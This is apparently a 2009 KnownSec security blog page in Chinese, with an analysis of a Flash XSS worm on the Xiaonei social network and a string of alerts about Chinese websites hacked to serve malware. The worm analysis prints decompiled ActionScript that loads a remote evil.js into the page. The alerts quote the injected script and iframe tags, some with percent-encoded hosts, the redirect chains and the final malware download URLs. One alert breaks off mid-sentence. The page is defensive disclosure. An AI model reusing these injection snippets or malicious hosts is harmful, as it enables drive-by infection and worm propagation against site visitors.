知道创宇

2009-08-21

我们今晚捕获到校内网（http://xiaonei.com or http://www.renen.com/）内传播的flash xss worm，下面是分析。

分析来源：知道安全（http://www.scanw.com/blog/）

威胁本质：
校内网的JS函数playswf可以动态地创建一个flash player容器（<embed type=”application/x-shockwave-flash”></embed>），而创建的flash player容器错误地使用了allowScriptAccess属性，代码片段如下：

playswf=function(el,_4e,_4f){
……
el.innerHTML=XN.Template.flash({width:w,height:h,filename:_4e});
……
};
XN.template.flash=function(o){
return “ <embed src=\”"+o.filename+”\” type=\”application/x-shockwave-flash\” “+”width=\”"+(o.width||”320″)+”\” height=\”"+(o.height||”240″)+”\” allowFullScreen=\”true\” wmode=\”"+(o.wmode||”transparent”)+”\” allowScriptAccess=\”always\”></embed>”;
};

当allowScriptAccess为always时，表明嵌入的第三方swf文件可以执行任意脚本，而执行任意脚本的作用域在当前域（即符合了同源策略）。攻击者此时就可以利用playswf函数的缺陷嵌入任意第三方swf文件而执行恶意脚本。

蠕虫分析：
登录校内网后会看到这个flash xss worm的传播证据：

当点击好友分享的视频（该视频来自土豆网）时，会打开一个伪造后的swf，如下，我的noscript拦截了：

这个恶意的flash链接是：hxxp://o.99081.com/xnxss/1.swf，它在做什么？看反编译后的源码，这是一段ActionScript脚本：

// Action script…

// [Action in Frame 1]
var fun = “var x=document.createElement(\”SCRIPT\”);x.src=\”http://n.99081.com/xnxss1/evil.js\”; x.defer=true;document.getElementsByTagName(\”HEAD\”)[0].appendChild(x);”;
flash.external.ExternalInterface.call(”eval”, fun);

loadMovie(”http://www.tudou.com/player/outside/player_outside.swf?iid=4120048&default_skin=http://js.tudouui.com/bin/player2/outside/Skin_outside_13.swf&autostart=false&rurl=”, this);

先使用flash.external.ExternalInterface.call调用flash外部DOM的eval函数（JavaScript内置函数）来执行一段JS脚本，该脚本会将http://n.99081.com/xnxss1/evil.js注入到DOM的<head>标签内并执行，执行完毕后再加载真正的视频文件进行播放，看视频的过程，蠕虫核心代码evil.js脚本已经执行，这防不胜防，与我之前测试的饭否网flash csrf worm有着异曲同工的猥琐。

evil.js都做了些什么，无非就是利用了AJAX进行悄然传播，让你也自动分享同样的视频，你的好友收到新鲜事提醒后，观看视频，继续传播，几何级数，蠕虫就是这样。其他不重要的细节就不提了，关键的一点是：如上面两张图，点击视频缩略图后，为什么播放的是恶意的swf文件，而不是真正的视频文件（来自土豆网的视频）？抓包分析，如下图（我用优酷的视频做个测试）：

这是在分享视频的过程中抓下的表单提交的数据，其中summary可以修改为任意第三方的swf文件地址，其他字段就随便吧。evil.js的传播、利用原理就是这样。

修补建议：
这个flash xss worm能爆发，原因就在上面提到的playswf函数的缺陷：allowScriptAccess为always是不安全的。校内网该如何去修补？校内网中用户分享的视频应该都来自第三方，如果allowScriptAccess不设置为always会影响到这些视频的播放吗？否则建议校内网在分享视频的表单提交中判断好summary字段的值，应该建立个白名单，只允许接收来自某些比较大的、可信的视频提供商的视频（比如优酷、土豆、youtube等）。

后记：
刚开始看到校内网这个蠕虫，我第一反应是csrf worm，类似我上次测试饭否的那个，因为校内网csrf漏洞实在太多，而且有些非常严重，官方不重视，还是不知道？分析时才发现是xss worm。只是这次创新了点，用flash封装了下。基于web传播的worm危害其实可以很大的，这次传播的蠕虫本身没什么危害，假如顺便挂个马呢？

知道创宇 - 余弦

Popularity: 13% [?]

发布时间：Fri Aug 21 2009 20:15:34 UTC+0800
最后更新时间：Fri Aug 21 2009 20:15:34 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 宅急送首页（http://www.zjs.cc/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.zjs.cc/

网页被嵌入恶意链接代码：

<script src=http://%68%69%39%2E%73%73%2E%6C%61></script>
挂马分析：
[wide]http://www.zjs.cc/
    [script]http://%68%69%39%2E%73%73%2E%6C%61
        [iframe]http://baidu8211.8866.org/aa/a3a.htm
            [iframe]http://baidu8211.8866.org/aa/index.html
                [iframe]http://baidu8211.8866.org/1/google.htm
                    [script]http://baidu8211.8866.org/1/google_ad.js
                        [iframe]http://baidu8211.8866.org/1/ec1.htm
                        [iframe]http://baidu8211.8866.org/1/cqqmp.htm
                    [script]http://baidu8211.8866.org/1/google_ads.js
                        [iframe]http://baidu8211.8866.org/1/cqq0.htm
                        [iframe]http://baidu8211.8866.org/1/ecqfun.htm
                    [script]http://baidu8211.8866.org/1/google_adx.js
                        [iframe]http://baidu8211.8866.org/1/fyr.htm
                        [iframe]http://baidu8211.8866.org/1/ecfox.htm
                    [script]http://baidu8211.8866.org/1/music.js
                        [iframe]http://baidu8211.8866.org/1/sfpf.htm
                [iframe]http://baidu8211.8866.org/ta2.htm
        [iframe]http://baidu8211.8866.org/aa/a3a.htm
    [script]http://%68%69%39%2E%73%73%2E%6C%61
最终下载病毒文件：
http://ttjjll.cn/1.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：1
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

发布时间：Fri Aug 21 2009 15:50:02 UTC+0800
最后更新时间：Fri Aug 21 2009 15:50:02 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获  IT168诺基亚论坛（http://nokia.it168.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://nokia.it168.com/

网页被嵌入恶意链接代码：

<script src=http://www.cfbase.com/cp.js></script>
挂马分析：
[wide]http://nokia.it168.com/
    [script]http://www.cfbase.com/cp.js
        [iframe]http://yeaw1.2288.org/wwj2/1.htm?
            [iframe]http://aijid.cn/x118/xx.html
                [iframe]http://aijid.cn/x118/td14.htm
                [iframe]http://aijid.cn/x118/yt.htm
                [iframe]http://aijid.cn/x118/dxxz.htm
                [iframe]http://aijid.cn/x118/yut.htm
                    [iframe]http://aijid.cn/x118/ytfl.htm
                    [iframe]http://aijid.cn/x118/ytfl1.htm
                    [iframe]http://aijid.cn/x118/of.htm
        [iframe]http://yeaw1.2288.org/wwj2/1.htm?
        [iframe]http://yeaw1.2288.org/wwj2/1.htm?
        [iframe]http://yeaw1.2288.org/wwj2/1.htm?
最终下载病毒文件：
http://d.aloxx.com/xx/x118.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：1
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

发布时间：Fri Aug 21 2009 15:41:51 UTC+0800
最后更新时间：Fri Aug 21 2009 15:41:51 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 手机中国（http://www.cnmo.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://v.cnmo.com/firm/11/10145.html

网页被嵌入恶意链接代码：

<iframe src=http://dsadsccc44.9966.org/ok/11.htm width=100 height=0></iframe>
挂马分析：
[wide]http://v.cnmo.com/firm/11/10145.html
    [iframe]http://dsadsccc44.9966.org/ok/11.htm
        [iframe]http://dsadsccc44.9966.org/ok/ganiniang360.html
            [iframe]http://dsadsccc44.9966.org/ok/firefox1.htm
            [iframe]http://dsadsccc44.9966.org/ok/gfddtt1.htm
            [iframe]http://dsadsccc44.9966.org/ok/qqlove1.htm
最终下载病毒文件：
http://1123886.3322.org/alg.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：1
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 4% [?]

发布时间：Wed Aug 19 2009 23:44:22 UTC+0800
最后更新时间：Wed Aug 19 2009 23:44:22 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 文心阁书库（http://www.wenxin8.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.wenxin8.com/include/js/common.js

网页被嵌入恶意链接代码：

document.write(’<script type=”text/javascript” src=”http://images.yourtrap.com/images/images.gif”></script>’);
挂马分析：
[wide]http://www.wenxin8.com/
[script]http://www.wenxin8.com/include/js/common.js
[script]http://images.yourtrap.com/images/images.gif
[iframe]http://doublesclick.9966.org/aa.htm
[iframe]http://doublesclick.9966.org/web3/web.htm
[iframe]http://doublesclick.9966.org/web3/nyntd14.htm
[iframe]http://doublesclick.9966.org/web3/yt.htm
[iframe]http://doublesclick.9966.org/web3/nyntdxxz.htm
[iframe]http://doublesclick.9966.org/web3/yut.htm
[iframe]http://doublesclick.9966.org/web3/ytfl.htm
[iframe]http://doublesclick.9966.org/web3/ytfl1.htm
[iframe]http://doublesclick.9966.org/web3/of.htm

最终下载病毒文件：
http://baiduhao3.3322.org/cmd.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：1
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

发布时间：Wed Aug 19 2009 23:35:31 UTC+0800
最后更新时间：Wed Aug 19 2009 23:35:31 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 法易网（http://www.laweach.com）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://photo.laweach.com/top.htm

网页被嵌入恶意链接代码：

<iframe src=http://1dds3333.3322.org/ok/09.htm width=100 height=0></iframe>
挂马分析：
[wide]http://photo.laweach.com/top.htm
[iframe]http://1dds3333.3322.org/ok/09.htm
[iframe]http://1dds3333.3322.org/ok/ganiniang360.html
[iframe]http://1dds3333.3322.org/ok/firefox1.htm
[iframe]http://1dds3333.3322.org/ok/gfddtt1.htm
[iframe]http://1dds3333.3322.org/ok/qqlove1.htm
[iframe]http://1dds3333.3322.org/ok/help.htm

最终下载病毒文件：
http://1123886.3322.org/alg.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 4% [?]

发布时间：Wed Aug 19 2009 20:34:45 UTC+0800
最后更新时间：Wed Aug 19 2009 20:34:45 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 随便找电影网（http://www.suibianzhao.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.suibianzhao.com/

网页被嵌入恶意链接代码：

<script src=http://%6F%6E%65%6C%75%6E%2E%63%6E></script>
挂马分析：
[wide]http://www.suibianzhao.com/
[script]http://%6f%6e%65%6c%75%6e%2e%63%6e
[iframe]http://yaad.3322.org/dszq/2.htm
[iframe]http://j7c7c.cn/x2/xx.html
[iframe]http://j7c7c.cn/x2/td14.htm
[iframe]http://j7c7c.cn/x2/yt.htm
[iframe]http://j7c7c.cn/x2/dxxz.htm
[iframe]http://j7c7c.cn/x2/yut.htm
[iframe]http://j7c7c.cn/x2/ytfl.htm
[iframe]http://j7c7c.cn/x2/ytfl1.htm
[iframe]http://j7c7c.cn/x2/of.htm

最终下载病毒文件：
http://d.awkxw.com/xx/x2.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：1
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 4% [?]

发布时间：Wed Aug 19 2009 20:19:02 UTC+0800
最后更新时间：Wed Aug 19 2009 20:19:02 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 驰为官方论坛（http://bbs.chuwi.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://bbs.chuwi.com/include/js/common.js?b9e

网页被嵌入恶意链接代码：

document.write(’<script src=http://60.190.236.11:8000/click.js></script>’)
挂马分析：
[wide]http://bbs.chuwi.com/
[script]http://bbs.chuwi.com/include/js/common.js?b9e
[script]http://60.190.236.11:8000/click.js
[iframe]http://polo1.9966.org/it/3.htm?
[iframe]http://polo1.9966.org/it/3333333.html
[iframe]http://polo1.9966.org/it/he.htm
[iframe]http://polo1.9966.org/it/ylmp.htm
[iframe]http://polo1.9966.org/it/ylxxz.htm
[iframe]http://polo1.9966.org/it/ylzn.htm
[iframe]http://polo1.9966.org/it/ylf10.htm
[iframe]http://polo1.9966.org/it/ylf9.htm
[iframe]http://polo1.9966.org/it/yloff.htm
[iframe]http://polo1.9966.org/it/r.htm
[iframe]http://polo1.9966.org/it/r.html
[script]http://js.users.51.la/3077323.js
[iframe]http://polo1.9966.org/it/3.htm?
[iframe]http://polo1.9966.org/it/3.htm?
[iframe]http://polo1.9966.org/it/3.htm?

最终下载病毒文件：
http://yanlan88.cn/j/z3.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：1
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 4% [?]

发布时间：Sat Aug 15 2009 22:54:42 UTC+0800
最后更新时间：Sat Aug 15 2009 22:54:42 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 西安交通大学管理学院（http://som.xjtu.edu.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://som.xjtu.edu.cn/

网页被嵌入恶意链接代码：

<script language=”JavaScript” src=”http://0810.%36%3600.org” type=”text/javascript” id=”seraph2script2108″  ></script>
挂马分析：
[wide]http://som.xjtu.edu.cn/
[script]http://0810.%36%3600.org
[iframe]http://cnksp.cn/dszq/3.htm
[iframe]http://g1a1e.cn/x3/xx.html
[iframe]http://g1a1e.cn/x3/td14.htm
[iframe]http://g1a1e.cn/x3/yt.htm
[iframe]http://g1a1e.cn/x3/dxxz.htm
[iframe]http://g1a1e.cn/x3/yut.htm
最终下载

Popularity: 4% [?]

发布时间：Tue Aug 18 2009 20:02:34 UTC+0800
最后更新时间：Tue Aug 18 2009 20:02:34 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 东方丽人模特艺术培训中心（http://www.e-model.com.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.e-model.com.cn/modeldetail4.asp?id=354

网页被嵌入恶意链接代码：

<script src=http://252a.cn/1.js></script>
挂马分析：
[wide]http://www.e-model.com.cn/modeldetail4.asp?id=354
[script]http://252a.cn/1.js
[iframe]http://baidu818.8866.org/aa/a3a.htm
[iframe]http://baidu818.8866.org/aa/index.html
[iframe]http://baidu818.8866.org/1/search.htm
[script]http://baidu818.8866.org/1/google_ad.js
[script]http://baidu818.8866.org/1/google_ads.js
[script]http://baidu818.8866.org/1/google_adx.js
[script]http://baidu818.8866.org/1/music.js
[iframe]http://baidu818.8866.org/aa/a3a.htm

最终下载病毒文件：
http://fuck.ss.la/1.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：1
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 4% [?]